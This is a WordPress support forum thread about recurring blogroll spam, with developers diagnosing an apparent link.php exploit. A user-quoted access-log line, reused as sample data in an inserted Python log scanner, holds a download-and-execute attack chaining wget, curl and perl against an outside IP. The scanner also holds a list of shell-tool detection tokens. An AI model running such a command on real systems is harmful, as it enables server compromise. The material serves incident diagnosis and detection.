
blogroll spam on WordPress 2.3 (44 posts)

  1. eweibust
    Member
    Posted 6 years ago #

    I am fighting a new form of spam on my blog. Just when I think I've got things pretty tightly locked the spammers find a new way. I'm getting spam in my blogroll.

    See for yourself (http://erik.weibust.net). I promise I'm not trying to sell male enhancement drugs from my site. It's taken me 12 hours to be able to joke about this, as I was quite pissed when I saw the intrusion.

    Anyhow, I'd love some help on resolving the issue and was thinking this would be a good place to start looking.

    Some background on the problem. I was running WP 2.1 until last night. The first thing that clued me into the problem was I got an email about a new user on my blog on Friday. That freaked me out as I'm the only user, and I didn't add a new user. So I login to the dashboard and immediately removed the user. I spent some time digging around my dashboard and didn't see anything "fishy" so I thought I might be ok.

    Then on Saturday I noticed there was a whole bunch of spam links added to my blogroll. I immediately logged in to the dashboard and removed the links. Then I checked the users tab, expecting to see a new user, there wasn't one. I'm at a loss as to how the links got added without a login to my blog. To be safe I changed my WP admin password.

    Sunday the spam was back. I didn't know what else to do, so I upgraded to WP 2.3 hoping that would help. No dice. Now I have a very generic blog, with a crapload of blogroll spam.

    Please help. I'm guessing the next step is to change the passwords for my db user and my ssh user. I can't change the password right now, I'm at work and can't get through my work proxy to the servers. I'm making the password change as soon as I get home.

    I've checked the sidebar and it looks clean. I program, but not in php, so I'm not 100% sure the sidebar is good. That said, I'm fine with deleting my sidebar and downloading/installing a new one, as I'm now running a completely stripped down template.

    What else should I do/check?

    Thanks...

  2. whooami
    Member
    Posted 6 years ago #

    Are you absolutely confident that those links were added AFTER your upgrade?

    I ask because there was an issue with an earlier version, but that should have been taken care of with 2.3.x

    If it were me, at the VERY least, I would email security@wordpress.org and include any information you can: server logs, etc.

  3. eweibust
    Member
    Posted 6 years ago #

    whooami, thanks for the quick response.

    I am absolutely, 100%, sure the links were added after the upgrade. As a matter of fact. I just now deleted the links. I bet within the next couple hours the blogroll spam links will be back.

    I want to make sure I'm clear on what's happened.

    1. I *was* using WP 2.1
    2. Somebody added a new user to my blog
    3. I deleted the user
    4. Somebody added blogroll spam to my blog
    5. I deleted the blogroll spam
    6. Somebody added the blogroll spam, again
    7. I upgraded my blog to WP 2.3
    8. After the upgrade the blogroll spam was still present, so I removed it
    9. The blogroll spam was added again.

    I hope that helps clear up the timeline.

    I'm about to change my db and ssh password, so maybe that will help, otherwise, I'm expecting to see the blogroll spam.

  4. whooami
    Member
    Posted 6 years ago #

    Well, do keep us advised. I, for one, am very curious. And send off that e-mail as well.

  5. eweibust
    Member
    Posted 6 years ago #

    Here is my update...

    I changed my db and ssh passwords and I'm still getting the blogroll spam. I've emailed the security@wordpress.org address.

    I'm kind of at a loss of what to do next. I would love any and all suggestions. I'm not about to shut my blog down after 4+ years of postings, but I REFUSE to let it be hacked like this.

    Is it possible to pull out my posts and comments and start over knowing I haven't been hacked? I have no problem with exporting my entries/content and then deleting every file/db on my host and starting fresh.

    Erik

  6. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    Rename wp-admin/link.php to something else. That should stop it for now.

    Somebody else reported this on trac yesterday, it appears to be a legit exploit that is in the wild. Although I'm uncertain how they added a new user if you don't allow registrations.

    http://trac.wordpress.org/ticket/4627

  7. ceffyl
    Member
    Posted 6 years ago #

    I'm running WP 2.1.2 and have encountered the same problems since this past weekend. I'll try the same solution tonight when I get home.

    My links page is here:
    http://ceffyl.net/wordpress/links/

    Details of what happened here: http://wordpress.org/support/topic/139049?replies=4#post-633352

  8. eweibust
    Member
    Posted 6 years ago #

    Otto42, thanks for the tip. I will try that as soon as I get home tonight (my company proxy blocks me from ssh'ing into my box).

    One other thing. My host, Dreamhost, said that there couldn't be anything wrong on the mysql box, but they specifically said to NOT USE the plugins SimpleTags and Subscribe to Comments, so I have disabled those.

    So as of right now, the only change I've made is disabling all 3rd party plugins. Tonight I will rename my link.php file.

    Thanks... Erik Weibust

  9. ceffyl
    Member
    Posted 6 years ago #

    I'm not using Subscribe To Comments, but I am using the Subscribe2 plugin. I'll try disabling that.

  10. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    Note that that will, of course, break your own ability to add entries to the blogroll as well. But then that's sort of the point, it's just a temporary workaround until a patch is created.

  11. moshu
    Member
    Posted 6 years ago #

    http://trac.wordpress.org/changeset/6256

    this fix has been posted recently

  12. eweibust
    Member
    Posted 6 years ago #

    Great feedback here. Thanks!

    I have two questions.

    1. How does one add a bug fix to an install? (sorry for not googling this before asking question)
    2. Do I still need to rename my links.php if I install this bug fix?

  13. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    1. You download the new, fixed, file and put it in place. There should be a link somewhere to download the new link.php file in "Original Format".

    2. No, that would defeat the point.

  14. whooami
    Member
    Posted 6 years ago #

  15. eweibust
    Member
    Posted 6 years ago #

    Guys, a big fat THANK YOU, to everyone, for all the help. I've applied the new link.php to my site and things appear to be resolved.

    If I have any other problems I'll let you know.

    Thanks...
    Erik Weibust

  16. Root
    Member
    Posted 6 years ago #

    GASP :)

  17. eweibust
    Member
    Posted 6 years ago #

    I hate to do this.... but the fix did not work. I woke up this morning and had 10 more spam blogroll links. :(

    I guess that I should just go ahead and rename links.php and wait for another fix.

    One question, if I rename links.php what do I lose? Will I still have a blogroll, but won't be able to update it? Or, will the blogroll completely disappear from my sidebar?

    Thanks...

  18. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    a) It's "link.php" (in the wp-admin folder), not "links.php". Don't rename the wrong thing.

    b) You'll lose the ability to edit or add to the blogroll in any way.

    Also, the fix should have worked. I suspect that you did not apply the fix correctly... considering that you keep referring to the wrong file name.

  19. eweibust
    Member
    Posted 6 years ago #

    Thanks Otto42,

    I hope you're right on me incorrectly applying the fix. I'll check when I get off work.

    I downloaded a zip file. Unzipped it. Scp'ed the file to my server. Renamed the existing file to link(s).php (not sure, are there two, both link and links?). Lastly, I copied the newly uploaded file to wp-admin dir.

    Erik

  20. eweibust
    Member
    Posted 6 years ago #

    Otto42,

    I believe I've done everything correctly with the fix. Here is what I've done.

    -rw-r--r-- 1 erikweibust pg928284 2506 Oct 16 18:27 link.php
    -rw-r--r-- 1 erikweibust pg928284 2824 Jun 1 19:53 link.php.bak

    I'm not sure what the best way is to show you what I've done other than by showing you the above ls -l.

    What do I need to do now?

    Erik

  21. eweibust
    Member
    Posted 6 years ago #

    One more update. I have renamed the link.php file so hopefully this stops the attacks while the WordPress people can investigate.

    Erik

  22. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    I don't know, that fix should work. I'll investigate it myself this evening.

    Renaming link.php will work, but again, disables your ability to manage the blogroll. Still, it will stop the bleeding for now.

  23. eweibust
    Member
    Posted 6 years ago #

    Otto42, Thanks a MILLION for all the help. Is there anything else I can provide that would be of any help? If so, please let me know.

    Erik

  24. viniciusweb
    Member
    Posted 6 years ago #

    I'm having the exact same problem. I updated from 2.1 to 2.3 three days ago because of blogroll spam but I keep getting spam links.

    Yesterday I found this post and I updated the "link.php" file correctly, but today another 41 spam links showed up in my blogroll.

    For now I'll change my theme so it displays the links with static HTML, instead of getting the links from the database.

  25. willyrs
    Member
    Posted 6 years ago #

    I just deleted 300 links from my blogroll. It's the same problem and the background is much the same--we were using 2.2x and found spam on the blogroll. I deleted it, checked all the permissions on folders and then upgraded to 2.3. They keep coming back.

    Our (custom) theme doesn't have a blogroll, so the links don't appear anywhere on the site. I've noticed a lot of incoming links from spam sites, too, so maybe this is a way to game search engines.

    No new admin users have appeared. We do have about 15,000 registered users, however.

    http://www.commondreams.org is our home page--but that's done with html. The stories, however, are all published with WordPress.

  26. Dion Hulse
    WordPress Dev
    Posted 6 years ago #

    Hi willyrs,
    Since installing WP 2.3, have you modified the link.php file in the wp-admin folder? (i.e. removed it and uploaded this one in its place: http://svn.automattic.com/wordpress/branches/2.3/wp-admin/link.php ?)

    If you have, and it's continuing, could you drop me a line at wordpress@dd32.id.au

    Hi eweibust/viniciusweb,
    I notice you have user registration disabled on your blogs. Has it always been like that? Or was it only just changed to prevent the spam?
    In order to complete the attack at present, the user needs to have an account (doesn't matter what role), AFAIK.
    Do you have access to your server logs? Can you check to see if there have been any admin entries for about the time the spam is being added?
    If you want some more help in tracing it, you can email me at the above address.

  27. viniciusweb
    Member
    Posted 6 years ago #

    dd32, thank you for your help.

    My blog never had other users. I checked now and the only user is "admin". The password was changed last week, but I don't know if there was more spam after the change (will be watching it now).

    I looked up the server logs and found a lot of entries for IP "195.5.116.246", making POST requests to the "link-add.php" file. This IP is cited by auxesis in http://trac.wordpress.org/ticket/4627

    Besides that, I found some requests like this:

    201.37.71.117 - - [19/Oct/2007:14:36:23 -0700] "GET /blog//wp-pass.php?_wp_http_referer=http://www.chamala.kit.net/tool25.txt?&cmd=cd%20/tmp;rm%20x.txt;wget%20http://201.37.71.117:8090/x.txt;fetch%20http://201.37.71.117:8090/x.txt;lwp-download%20http://201.37.71.1175:8090/x.txt;curl%20-O%20http://201.37.71.117:8090/x.txt;lynx%20http://201.37.71.117:8090/x.txt;perl%20x.txt HTTP/1.1" 503 620 "-" "Mozilla/3.0 (compatible; Indy Library)"

    The "http://www.chamala.kit.net/tool25.txt" points to a PHP script and "http://201.37.71.1175:8090/x.txt" points to a Perl script. I hadn't checked the code yet.

    Let me know if you need any other information.
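
As an added example (not code from the thread or from WordPress), this scanner runs over combined-format access log lines like the one quoted above and tags the two patterns the thread identifies: wp-pass.php requests whose _wp_http_referer is a remote URL or whose query carries a download-and-execute chain, and POSTs to the wp-admin link endpoints that write the blogroll. The benign and POST sample lines and their 198.51.100.x addresses are constructed; the tag names are my own.

```python
import re
from urllib.parse import unquote

# Combined log format: ip ident user [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "[^"]*" "[^"]*"')
# Download-and-execute tools chained with ';' in the wp-pass.php payload quoted in the thread.
SHELL_TOKENS = ("wget ", "curl ", "fetch ", "lwp-download ", "lynx ", "perl ", "cd /tmp")
# Admin endpoints that write the blogroll (the vector the thread converges on).
LINK_ENDPOINTS = ("/wp-admin/link-add.php", "/wp-admin/link.php")

def parse_query(query):
    """Split on '&' only (never ';', which the payload uses as a shell separator)."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key:
            params[unquote(key)] = unquote(value)
    return params

def classify(line):
    """Return (ip, tags) for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    params, tags = parse_query(query), []
    if path.endswith("/wp-pass.php"):
        if params.get("_wp_http_referer", "").startswith(("http://", "https://")):
            tags.append("wp-pass-remote-referer")      # off-site redirect / link laundering
        if any(t in v.lower() for v in params.values() for t in SHELL_TOKENS):
            tags.append("wp-pass-command-injection")   # cmd=cd /tmp;wget ...;perl x.txt
    if m.group("method") == "POST" and path.endswith(LINK_ENDPOINTS):
        tags.append("blogroll-write")                  # correlate with genuine admin sessions
    return m.group("ip"), tags

def scan(lines):
    """Aggregate tags per source IP so repeated offenders stand out."""
    hits = {}
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            hits.setdefault(parsed[0], []).extend(parsed[1])
    return hits

# Constructed sample: line 1 is the request quoted in the thread; lines 2-3 use documentation-range IPs.
SAMPLE_LOG = [
    '201.37.71.117 - - [19/Oct/2007:14:36:23 -0700] "GET /blog//wp-pass.php?_wp_http_referer=http://www.chamala.kit.net/tool25.txt?&cmd=cd%20/tmp;rm%20x.txt;wget%20http://201.37.71.117:8090/x.txt;fetch%20http://201.37.71.117:8090/x.txt;lwp-download%20http://201.37.71.1175:8090/x.txt;curl%20-O%20http://201.37.71.117:8090/x.txt;lynx%20http://201.37.71.117:8090/x.txt;perl%20x.txt HTTP/1.1" 503 620 "-" "Mozilla/3.0 (compatible; Indy Library)"',
    '198.51.100.7 - - [19/Oct/2007:14:40:01 -0700] "GET /blog/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [19/Oct/2007:14:41:12 -0700] "POST /blog/wp-admin/link-add.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"',
]
```

A blogroll-write tag on its own is not proof of abuse; the useful signal is a POST to those endpoints from an address with no preceding login, or at the times the spam links appear.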

  28. Ryan Boren
    WordPress Dev
    Posted 6 years ago #

    The wp-pass.php GET is a link laundering attempt that we now block.

    I'm not sure how posting to link-add.php would allow this, but I'm digging into it.

  29. Dion Hulse
    WordPress Dev
    Posted 6 years ago #

    > I'm not sure how posting to link-add.php would allow this, but I'm digging into it.
    Neither am I. I get blocked by user_can_access_admin_page(), but I can't find any modifying code anywhere in there.

    Hi viniciusweb,

    Could you add some debugging code to the affected pages? (I'm thinking link.php and link-add.php.)
    Maybe something like this:

    // The request method lives in $_SERVER['REQUEST_METHOD'] (there is no REQUEST_TYPE key).
    if ( 'POST' == $_SERVER['REQUEST_METHOD'] ) {
        error_log(print_r($_POST, true));          // what was submitted
        global $current_user;
        error_log(print_r($current_user, true));   // who WordPress thinks is logged in
    }

    You could probably use the mail command too:

    if ( 'POST' == $_SERVER['REQUEST_METHOD'] ) {
        global $current_user;
        wp_mail('me@myaddress.com', 'WP debug', print_r($_POST, true));
        wp_mail('me@myaddress.com', 'WP debug', print_r($current_user, true));
    }

    (If you do that, can you forward the stuff onto me?)

    That goes for anyone who is getting this spam: if you want to help, send some raw information over so we can determine how it's getting past.

  30. From a review of the old code and the patch proposed for 2.3.1 I can't see how the links are getting added by the POST requests on link.php unless the requests are being made by a user with the extra capability check for manage_links at the top of link.php, as this is already checked later in the code path before the link is added in edit_link (called by add_link for link additions).

    It looks like therefore the POST request must be coming in with valid cookies for a high level user.

    Can those who have been affected by this issue confirm:

    1. What version of WordPress you were running?
    2. What plugins you have installed
    3. If user registration was enabled
    4. If you found extra users had been added at the time this issue occurred

    Cheers westi
